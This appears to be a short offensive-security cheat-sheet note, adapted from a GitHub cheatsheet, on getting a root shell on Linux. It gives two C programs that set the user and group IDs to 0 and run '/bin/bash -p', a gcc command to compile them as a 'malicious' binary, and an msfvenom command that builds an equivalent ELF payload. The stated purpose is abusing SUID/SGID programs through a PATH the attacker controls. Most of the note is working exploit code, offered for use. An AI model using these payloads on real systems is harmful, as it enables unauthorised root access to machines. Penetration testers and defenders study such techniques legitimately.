# Load a shell with a simple executable > [!note] > Adapted from [slyth11907 / Cheatsheets / Cheatsheet_QuickCShell](https://github.com/slyth11907/Cheatsheets/blob/master/Cheatsheet_QuickCShell). It's actually trivial to write a C program that loads up a shell. ```c #include <stdio.h> #include <unistd.h> main() { setuid(0); setgid(0); execl("/bin/bash", "/bin/bash", "-p", (char*) NULL); } ``` Alternate approach: ```c #include <stdio.h> #include <time.h> main() { setresuid(0, 0, 0); setregid(0, 0, 0); system("/bin/bash -p"); return 0; } ``` Compile with: ```bash gcc -fPIC -o /path/to/malicious /path/to/malicious.c ``` Note that this is *almost* identical to [[Exploit LD_PRELOAD|the LD\_PRELOAD trick]]; the primary differences are: - Use `main()` instead of `_init()` as our entry point. - Compile without `-shared` and `-nostartfiles`. A simple binary like this is useful for exploiting SUID/SGID applications that call other executables from part of the PATH that we control. > [!tip] > [[Avoid dropping privileges with SUID Bash|Remember that the -p flag is required to keep Bash from dropping privileges!]] ## Using Metasploit Metasploit's [[msfvenom]] tool can generate binaries that launch any command as root (useful for exploiting SUID/SGID applications that call other executables from part of the PATH that we control). ```bash msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf \ -o shell.elf ``` > [!tip] > [[Avoid dropping privileges with SUID Bash|Remember that the -p flag is required to keep Bash from dropping privileges!]]